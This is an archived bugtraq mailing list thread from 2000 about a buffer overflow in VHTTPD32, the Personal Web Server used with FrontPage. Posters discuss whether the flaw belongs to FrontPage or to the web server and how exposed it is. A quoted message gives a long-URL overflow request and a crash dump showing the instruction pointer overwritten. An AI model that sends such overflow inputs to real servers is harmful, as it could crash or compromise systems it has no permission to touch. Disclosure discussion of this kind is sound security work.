'Re: More vulnerabilities in FP'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: More vulnerabilities in FP
From:       Ian McDonald <ian () router ! econz ! co ! nz>
Date:       2000-04-26 7:20:32
[Download RAW message or body]

VHTTPD32 is used as part of the PWS on a 9x or NT client.

Generally it would only be run to serve web pages to a user on the same
machine. We use it for example for FrontPage files stored on the local
PC with search results.

If you had console access PWS is probably the least of the worries!!

Regards,

Ian

Daniel Dočekal wrote:
>
> That's hardly overflow in FP, VHTTPD32 does not seem to be part of WindowsNT
> and more hardly of Frontpage (could be some old version of course), what
> operating system are you using?
>
> This seems to be  overflow in HTTP (Web Server, PWS or IIS) and for
> WIndowsNT it was handled long time ago in some postfix and service packs.
>
> It would be good idea to include complete information about the system you
> are testing, otherwise it is useless.
>
> Daniel
>
> > -----Original Message-----
> > From: Roman [mailto:webmad@MAIL.RU]
> > Sent: Saturday, April 22, 2000 10:16 PM
> > To: BUGTRAQ@SECURITYFOCUS.COM
> > Subject: Re: More vulnerabilities in FP
> >
> >
> > Hello,
> >
> > > First remote FrontPage exploit?
> >
> > How about this one:
> > http://server/AAAAAAAAAAAA<a lots of A>AAAAAA
> >
> > FP will overflow and someone will see this message:
> >
> > VHTTPD32 caused an invalid page fault in
> > module <unknown> at 0000:41414141.
> > Registers:
> > EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
> > EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
> > ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
> > EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
> > Bytes at CS:EIP:
> >
> > Stack dump:
> > 41414141 41414141 66204141 656c6961 6f662064 32312072
> > 2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
> > 6e207365 6520746f 74736978 00000000
> >
> > Tested on FP 3.0.2.926. Maybe others?
> >

--
====================================================================
| Ian McDonald         | email: ian@econz.co.nz   Ph: 09-378 8611  |
| Technical Consultant | ICQ 31381444            Fax: 09-378 9010  |
|                      |                      Mobile: 025-728 724  |
|                      | mail: PO Box 68-261 Newton Auckland       |
| ECONZ (1971) Ltd     | Visit our WEBSITE: http://www.econz.co.nz |
--------------------------------------------------------------------

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic